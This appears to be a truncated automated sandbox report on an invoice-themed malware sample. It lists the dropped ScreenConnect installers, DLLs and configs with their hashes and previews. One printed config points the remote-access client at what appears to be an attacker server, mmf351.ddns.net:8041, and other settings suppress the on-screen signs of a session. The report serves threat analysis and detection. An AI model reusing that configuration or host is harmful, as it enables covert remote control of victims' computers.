                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                Malicious:true
                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):842248
                                                                                Entropy (8bit):6.268561504485627
                                                                                Encrypted:false
                                                                                SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):81696
                                                                                Entropy (8bit):5.862223562830496
                                                                                Encrypted:false
                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):266
                                                                                Entropy (8bit):4.842791478883622
                                                                                Encrypted:false
                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1970
                                                                                Entropy (8bit):4.690426481732819
                                                                                Encrypted:false
                                                                                SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:XML 1.0 document, ASCII text, with very long lines (457), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):947
                                                                                Entropy (8bit):5.774945260810184
                                                                                Encrypted:false
                                                                                SSDEEP:24:2dL9hK6E4dl/dGu44AUXgzfwM3lTX+5iwntUEvH:chh7HHBLsfwudX+5i8UEv
                                                                                MD5:3906D9DDE69B3DA892F17E7FAC994EBE
                                                                                SHA1:417C8490B708CCE4E3A58E54CFC3AEA9C3AAB3C9
                                                                                SHA-256:E1B6143EDCFCB72A9221D2906ACAE53723FF5F5F2C77A34B33ADE0CE23223E11
                                                                                SHA-512:427AE8B3069AEE0E724F2EF5D99ABE1653847119E212B280BF84BEA53B7D3AC10F708F71EE4CF4DF9AC9F724B8018D482B02BF418AFB72421CD8A2264AC00CB3
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=mmf351.ddns.net&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                Process:C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):321
                                                                                Entropy (8bit):5.36509199858051
                                                                                Encrypted:false
                                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                Malicious:true
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):746
                                                                                Entropy (8bit):5.349174276064173
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                Category:dropped
                                                                                Size (bytes):1086792
                                                                                Entropy (8bit):7.793516535218678
                                                                                Encrypted:false
                                                                                SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                                MD5:30CA21632F98D354A940903214AE4DE1
                                                                                SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                                SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                                SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):234
                                                                                Entropy (8bit):4.977464602412109
                                                                                Encrypted:false
                                                                                SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                Malicious:false
                                                                                Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):4.62694170304723
                                                                                Encrypted:false
                                                                                SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):36864
                                                                                Entropy (8bit):4.340550904466943
                                                                                Encrypted:false
                                                                                SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):57344
                                                                                Entropy (8bit):4.657268358041957
                                                                                Encrypted:false
                                                                                SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):176128
                                                                                Entropy (8bit):5.775360792482692
                                                                                Encrypted:false
                                                                                SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):548864
                                                                                Entropy (8bit):6.031251664661689
                                                                                Encrypted:false
                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):11776
                                                                                Entropy (8bit):5.267782165666963
                                                                                Encrypted:false
                                                                                SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                                MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                                SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                                SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                                SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1721856
                                                                                Entropy (8bit):6.639136400085158
                                                                                Encrypted:false
                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                Process:C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe
                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {5432CC63-8BF4-F791-1B1A-15E2F80B3217}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                Category:dropped
                                                                                Size (bytes):13336576
                                                                                Entropy (8bit):7.968463586251202
                                                                                Encrypted:false
                                                                                SSDEEP:196608:M53JLR3LGMLiW35h53JLR3LGMLL53JLR3LGMLd53JLR3LGMLM53JLR3LGMLs53Jl:8TiubTRTHT8TcT0TG
                                                                                MD5:2158DB1CF9CEBD9BABB4EDB1534FB203
                                                                                SHA1:9209D3CB6BDCB2157E2B7B47F990971C6DBB2D45
                                                                                SHA-256:3745E94A8A423C9CCF96C7D32C1DFE534778C9E0E4607D7855349F69F873CFAE
                                                                                SHA-512:531F43AC05AC31345D940579C21C5078D9EBA4F519B2F5B89BB1C181790D00E710EF9DDE4B23715E8EEF9D8F9118816042BC3D07141F09A78D04190636CBB119
                                                                                Malicious:false
                                                                                Preview:......................>.......................................................{...b...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {5432CC63-8BF4-F791-1B1A-15E2F80B3217}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                Category:dropped
                                                                                Size (bytes):13336576
                                                                                Entropy (8bit):7.968463586251202
                                                                                Encrypted:false
                                                                                SSDEEP:196608:M53JLR3LGMLiW35h53JLR3LGMLL53JLR3LGMLd53JLR3LGMLM53JLR3LGMLs53Jl:8TiubTRTHT8TcT0TG
                                                                                MD5:2158DB1CF9CEBD9BABB4EDB1534FB203
                                                                                SHA1:9209D3CB6BDCB2157E2B7B47F990971C6DBB2D45
                                                                                SHA-256:3745E94A8A423C9CCF96C7D32C1DFE534778C9E0E4607D7855349F69F873CFAE
                                                                                SHA-512:531F43AC05AC31345D940579C21C5078D9EBA4F519B2F5B89BB1C181790D00E710EF9DDE4B23715E8EEF9D8F9118816042BC3D07141F09A78D04190636CBB119
                                                                                Malicious:false
                                                                                Preview:......................>.......................................................{...b...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {5432CC63-8BF4-F791-1B1A-15E2F80B3217}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                Category:dropped
                                                                                Size (bytes):13336576
                                                                                Entropy (8bit):7.968463586251202
                                                                                Encrypted:false
                                                                                SSDEEP:196608:M53JLR3LGMLiW35h53JLR3LGMLL53JLR3LGMLd53JLR3LGMLM53JLR3LGMLs53Jl:8TiubTRTHT8TcT0TG
                                                                                MD5:2158DB1CF9CEBD9BABB4EDB1534FB203
